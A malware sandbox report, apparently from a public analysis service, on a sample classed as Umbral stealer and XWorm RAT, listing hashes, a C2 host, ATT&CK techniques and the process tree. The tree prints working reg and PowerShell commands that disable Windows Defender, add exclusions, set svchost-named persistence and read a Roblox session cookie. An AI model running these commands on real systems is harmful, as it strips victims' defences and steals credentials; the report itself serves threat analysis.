umbral | ff1b8f8a4d7fcd8081bf395561e9147ca934b74d6b9e04b5a31294c3545bb2d3

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
05-08-2024 19:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Nexus.exe
Size

952KB
MD5

7810f2e2c8cad759720e963897a280d8
SHA1

9d427df697eb19c8a011b852c04a1c351d111312
SHA256

ff1b8f8a4d7fcd8081bf395561e9147ca934b74d6b9e04b5a31294c3545bb2d3
SHA512

ccc23c8e26f1dd85dbee275b907bc35d7ea6532ea2e28e4067cac59cf3f6554b46a9141c6047f40e7a6a8ef4470ee39c997d2f5d7bc8573fcd5f6b262a9e8787
SSDEEP

12288:9OxPkPjQeqQ1Y53KR8PKpL7R50aRweHvZIp7rt9CRMmmXeu/IsbPR2CfNS+jWC71:rEeqQq3KDPRcePCp7rGRMLXeAVRHS+35

Score

10^/10

umbral xworm credential_access discovery evasion execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:33700

21.ip.gl.ply.gg:33700

Attributes

Install_directory
%Public%
install_file
svchost.exe

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/memory/3632-178-0x000000001DA90000-0x000000001DA9E000-memory.dmp	disable_win_def

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00070000000234e0-22.dat	family_umbral
behavioral1/memory/2912-39-0x000002D413810000-0x000002D413850000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00090000000234dd-12.dat	family_xworm
behavioral1/memory/3632-38-0x0000000000CA0000-0x0000000000CB8000-memory.dmp	family_xworm

Modifies Windows Defender Real-time Protection settings 3 TTPs 12 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies Windows Defender notification settings 3 TTPs 3 IoCs

evasion trojan

Windows Service

T1543.003

Modify Registry

T1112

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4472	powershell.exe
2552	powershell.exe
4104	powershell.exe
2716	powershell.exe
4532	powershell.exe
4456	powershell.exe
316	powershell.exe
4540	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	DllInstaller.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	Nexus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	Inject.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	Inject.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	Inject.exe

Executes dropped EXE 3 IoCs

pid	Process
3632	Inject.exe
2912	DllInstaller.exe
1452	NexusBootstrapper.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Public\\svchost.exe"	Inject.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
31	discord.com
3	raw.githubusercontent.com
5	raw.githubusercontent.com
30	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com
28	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1176	1452	WerFault.exe	88

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NexusBootstrapper.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5068	wmic.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
2912	DllInstaller.exe
2716	powershell.exe
2716	powershell.exe
4104	powershell.exe
4104	powershell.exe
4472	powershell.exe
4472	powershell.exe
2444	powershell.exe
2444	powershell.exe
4532	powershell.exe
4532	powershell.exe
2552	powershell.exe
2552	powershell.exe
4532	powershell.exe
2552	powershell.exe
4456	powershell.exe
4456	powershell.exe
316	powershell.exe
316	powershell.exe
4540	powershell.exe
4540	powershell.exe
3632	Inject.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3632	Inject.exe
Token: SeDebugPrivilege	2912	DllInstaller.exe
Token: SeIncreaseQuotaPrivilege	4696	wmic.exe
Token: SeSecurityPrivilege	4696	wmic.exe
Token: SeTakeOwnershipPrivilege	4696	wmic.exe
Token: SeLoadDriverPrivilege	4696	wmic.exe
Token: SeSystemProfilePrivilege	4696	wmic.exe
Token: SeSystemtimePrivilege	4696	wmic.exe
Token: SeProfSingleProcessPrivilege	4696	wmic.exe
Token: SeIncBasePriorityPrivilege	4696	wmic.exe
Token: SeCreatePagefilePrivilege	4696	wmic.exe
Token: SeBackupPrivilege	4696	wmic.exe
Token: SeRestorePrivilege	4696	wmic.exe
Token: SeShutdownPrivilege	4696	wmic.exe
Token: SeDebugPrivilege	4696	wmic.exe
Token: SeSystemEnvironmentPrivilege	4696	wmic.exe
Token: SeRemoteShutdownPrivilege	4696	wmic.exe
Token: SeUndockPrivilege	4696	wmic.exe
Token: SeManageVolumePrivilege	4696	wmic.exe
Token: 33	4696	wmic.exe
Token: 34	4696	wmic.exe
Token: 35	4696	wmic.exe
Token: 36	4696	wmic.exe
Token: SeDebugPrivilege	1452	NexusBootstrapper.exe
Token: SeIncreaseQuotaPrivilege	4696	wmic.exe
Token: SeSecurityPrivilege	4696	wmic.exe
Token: SeTakeOwnershipPrivilege	4696	wmic.exe
Token: SeLoadDriverPrivilege	4696	wmic.exe
Token: SeSystemProfilePrivilege	4696	wmic.exe
Token: SeSystemtimePrivilege	4696	wmic.exe
Token: SeProfSingleProcessPrivilege	4696	wmic.exe
Token: SeIncBasePriorityPrivilege	4696	wmic.exe
Token: SeCreatePagefilePrivilege	4696	wmic.exe
Token: SeBackupPrivilege	4696	wmic.exe
Token: SeRestorePrivilege	4696	wmic.exe
Token: SeShutdownPrivilege	4696	wmic.exe
Token: SeDebugPrivilege	4696	wmic.exe
Token: SeSystemEnvironmentPrivilege	4696	wmic.exe
Token: SeRemoteShutdownPrivilege	4696	wmic.exe
Token: SeUndockPrivilege	4696	wmic.exe
Token: SeManageVolumePrivilege	4696	wmic.exe
Token: 33	4696	wmic.exe
Token: 34	4696	wmic.exe
Token: 35	4696	wmic.exe
Token: 36	4696	wmic.exe
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	4472	powershell.exe
Token: SeDebugPrivilege	2444	powershell.exe
Token: SeIncreaseQuotaPrivilege	920	wmic.exe
Token: SeSecurityPrivilege	920	wmic.exe
Token: SeTakeOwnershipPrivilege	920	wmic.exe
Token: SeLoadDriverPrivilege	920	wmic.exe
Token: SeSystemProfilePrivilege	920	wmic.exe
Token: SeSystemtimePrivilege	920	wmic.exe
Token: SeProfSingleProcessPrivilege	920	wmic.exe
Token: SeIncBasePriorityPrivilege	920	wmic.exe
Token: SeCreatePagefilePrivilege	920	wmic.exe
Token: SeBackupPrivilege	920	wmic.exe
Token: SeRestorePrivilege	920	wmic.exe
Token: SeShutdownPrivilege	920	wmic.exe
Token: SeDebugPrivilege	920	wmic.exe
Token: SeSystemEnvironmentPrivilege	920	wmic.exe
Token: SeRemoteShutdownPrivilege	920	wmic.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3632	Inject.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 960 wrote to memory of 4828	960	Nexus.exe	82
PID 960 wrote to memory of 4828	960	Nexus.exe	82
PID 960 wrote to memory of 3632	960	Nexus.exe	85
PID 960 wrote to memory of 3632	960	Nexus.exe	85
PID 960 wrote to memory of 2912	960	Nexus.exe	86
PID 960 wrote to memory of 2912	960	Nexus.exe	86
PID 960 wrote to memory of 1452	960	Nexus.exe	88
PID 960 wrote to memory of 1452	960	Nexus.exe	88
PID 960 wrote to memory of 1452	960	Nexus.exe	88
PID 4828 wrote to memory of 1948	4828	cmd.exe	89
PID 4828 wrote to memory of 1948	4828	cmd.exe	89
PID 4828 wrote to memory of 3448	4828	cmd.exe	91
PID 4828 wrote to memory of 3448	4828	cmd.exe	91
PID 4828 wrote to memory of 4288	4828	cmd.exe	92
PID 4828 wrote to memory of 4288	4828	cmd.exe	92
PID 4828 wrote to memory of 4944	4828	cmd.exe	93
PID 4828 wrote to memory of 4944	4828	cmd.exe	93
PID 4828 wrote to memory of 2764	4828	cmd.exe	94
PID 4828 wrote to memory of 2764	4828	cmd.exe	94
PID 4828 wrote to memory of 2220	4828	cmd.exe	95
PID 4828 wrote to memory of 2220	4828	cmd.exe	95
PID 4828 wrote to memory of 4540	4828	cmd.exe	96
PID 4828 wrote to memory of 4540	4828	cmd.exe	96
PID 4828 wrote to memory of 4980	4828	cmd.exe	97
PID 4828 wrote to memory of 4980	4828	cmd.exe	97
PID 4828 wrote to memory of 4704	4828	cmd.exe	98
PID 4828 wrote to memory of 4704	4828	cmd.exe	98
PID 4828 wrote to memory of 2420	4828	cmd.exe	99
PID 4828 wrote to memory of 2420	4828	cmd.exe	99
PID 4828 wrote to memory of 4336	4828	cmd.exe	100
PID 4828 wrote to memory of 4336	4828	cmd.exe	100
PID 4828 wrote to memory of 1736	4828	cmd.exe	101
PID 4828 wrote to memory of 1736	4828	cmd.exe	101
PID 4828 wrote to memory of 1804	4828	cmd.exe	102
PID 4828 wrote to memory of 1804	4828	cmd.exe	102
PID 4828 wrote to memory of 2876	4828	cmd.exe	103
PID 4828 wrote to memory of 2876	4828	cmd.exe	103
PID 4828 wrote to memory of 3508	4828	cmd.exe	104
PID 4828 wrote to memory of 3508	4828	cmd.exe	104
PID 4828 wrote to memory of 4160	4828	cmd.exe	105
PID 4828 wrote to memory of 4160	4828	cmd.exe	105
PID 4828 wrote to memory of 752	4828	cmd.exe	106
PID 4828 wrote to memory of 752	4828	cmd.exe	106
PID 4828 wrote to memory of 972	4828	cmd.exe	107
PID 4828 wrote to memory of 972	4828	cmd.exe	107
PID 4828 wrote to memory of 3316	4828	cmd.exe	108
PID 4828 wrote to memory of 3316	4828	cmd.exe	108
PID 4828 wrote to memory of 4600	4828	cmd.exe	109
PID 4828 wrote to memory of 4600	4828	cmd.exe	109
PID 4828 wrote to memory of 2400	4828	cmd.exe	110
PID 4828 wrote to memory of 2400	4828	cmd.exe	110
PID 4828 wrote to memory of 368	4828	cmd.exe	111
PID 4828 wrote to memory of 368	4828	cmd.exe	111
PID 4828 wrote to memory of 1508	4828	cmd.exe	112
PID 4828 wrote to memory of 1508	4828	cmd.exe	112
PID 4828 wrote to memory of 2524	4828	cmd.exe	114
PID 4828 wrote to memory of 2524	4828	cmd.exe	114
PID 2912 wrote to memory of 4696	2912	DllInstaller.exe	115
PID 2912 wrote to memory of 4696	2912	DllInstaller.exe	115
PID 2912 wrote to memory of 2716	2912	DllInstaller.exe	120
PID 2912 wrote to memory of 2716	2912	DllInstaller.exe	120
PID 2912 wrote to memory of 4104	2912	DllInstaller.exe	122
PID 2912 wrote to memory of 4104	2912	DllInstaller.exe	122
PID 2912 wrote to memory of 4472	2912	DllInstaller.exe	124

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Nexus.exe
"C:\Users\Admin\AppData\Local\Temp\Nexus.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Nexus\AntiWD.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4828
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender notification settings
    PID:1948
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f
    3⤵
    PID:3448
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
    3⤵
    PID:4288
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    3⤵
    PID:4944
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f
    3⤵
    PID:2764
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    3⤵
    PID:2220
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    3⤵
    PID:4540
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f
    3⤵
    PID:4980
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f
    3⤵
    PID:4704
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    3⤵
    PID:2420
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:4336
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1736
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1804
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2876
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3508
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:4160
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    3⤵
    PID:752
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
    3⤵
    PID:972
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    3⤵
    PID:3316
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
    3⤵
    PID:4600
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:2400
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:368
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    3⤵
    PID:1508
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:2524
- C:\ProgramData\Nexus\Inject.exe
  "C:\ProgramData\Nexus\Inject.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:3632
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Nexus\Inject.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4532
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Inject.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4456
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:316
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4540
- C:\ProgramData\Nexus\DllInstaller.exe
  "C:\ProgramData\Nexus\DllInstaller.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2912
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4696
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData\Nexus\DllInstaller.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4104
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4472
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2444
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:920
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:1508
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:3476
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2552
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5068
- C:\ProgramData\Nexus\NexusBootstrapper.exe
  "C:\ProgramData\Nexus\NexusBootstrapper.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:1452
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1452 -s 1672
    3⤵
    - Program crash
    PID:1176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1452 -ip 1452
1⤵
PID:2688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Nexus\AntiWD.bat

Filesize
2KB

MD5
2392ee1c92c819f0a47fd5fd117f074d

SHA1
eec3ec621ed57a925138fed3b516ce3b598852c6

SHA256
d2f6d345a1429e8004a0013f52cf9a29b093a7755afcadc04281347ea85774fb

SHA512
25aa6ef6407b379e1bcefef463b471ed29524d8887f7a021f849636fec9b94f4ffd7795c9346da15adf81eb76880a59b8030d47a9b3195387eca4631241944dc

Download Submit
C:\ProgramData\Nexus\DllInstaller.exe

Filesize
229KB

MD5
dc24b6e92e759790fde782b104326979

SHA1
7561be98eb5e517d2fe7997948c5537222cbe8b1

SHA256
97beb74fbbb969354d75a2711cd504373398cabfa234f4ba9c7b55ee150a9a68

SHA512
cfe670744bd36acb27c5cccdf1fce3838cdcc3d0f772e80b972add5288b88cb9750fcf7fb42cd82fe3d75c67cb66d755c10b8b9dce179f072dbb29ebbed01358

Download Submit
C:\ProgramData\Nexus\Inject.exe

Filesize
68KB

MD5
07ab6bc9d91526d66b5bee3c8cfbf631

SHA1
b473db762b52590e4b3f839f7bd8451e14a5f65f

SHA256
cb1b14efb2fa2c647ba41fa323abc9c9981e5deebb45f1c8bab8fc7ddafe96e3

SHA512
2d4350e6c60856bf8c73092caddc4cd1e190a73f29f56bcd28c4570aa1c0145b7813cd6ac4c7806b34c5f9b48ca2ffbbb37d7c9d85fd228e94b8a9679914866a

Download Submit
C:\ProgramData\Nexus\NexusBootstrapper.exe

Filesize
796KB

MD5
fa65805dc79caefec703e1339141fc65

SHA1
9f2480739aac09dcf254d87f5f63deaea8296404

SHA256
d122b76e0739d706b0c3078136fd05d55e92b09dca92864c66b428fa8c0da748

SHA512
b2fd9027cf118727dc5688912a0909403afede90a6efcb5e616dcca575753b82a85ba48f3d08b63148f5c5795d1af35f69803dde2fef358f94dd367ec55f1b63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2984662ba3f86d7fcf26758b5b76754d

SHA1
bc2a43ffd898222ee84406313f3834f226928379

SHA256
f0815f797b0c1829745dd65985f28d459688f91ceb2f3d76fed2d4309589bcde

SHA512
a06251a7a14559ebf5627a3c6b03fda9ded1d4ee44991283c824ccf5011cdf67665696d2d9b23507cbb3e3b9943b9e9f79ef28d3657eb61fb99920225417ab11

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
f9ceadd5a37282b98bb6859c91222632

